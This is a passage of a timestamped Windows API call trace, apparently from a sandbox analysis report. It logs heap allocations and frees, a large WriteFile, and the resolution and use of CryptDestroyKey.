(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0203.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xffd020 | out: hHeap=0x970000) returned 1 [0203.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0203.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0203.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0203.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0203.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0203.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1255020 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0203.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf2a020 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0203.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0203.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0203.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0203.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0203.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0203.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0xe5e020 [0203.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1316020 | out: hHeap=0x970000) returned 1 [0203.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0203.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0203.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0203.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0203.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0203.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0203.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0xf27020 [0203.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0203.767] WriteFile (in: hFile=0x2a0, lpBuffer=0xf27020*, nNumberOfBytesToWrite=0xb81d8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf27020*, lpNumberOfBytesWritten=0x8cf5e4*=0xb81d8, lpOverlapped=0x0) returned 1 [0203.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0203.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf27020 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0203.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0203.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0203.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0203.826] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0203.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0203.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0203.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0203.827] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0203.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0203.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0203.828] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0203.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0203.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0203.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0203.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0203.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0203.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0203.830] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0203.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0203.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.831] CryptDestroyKey (hKey=0xa87250) returned 1 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0203.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0203.832] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, 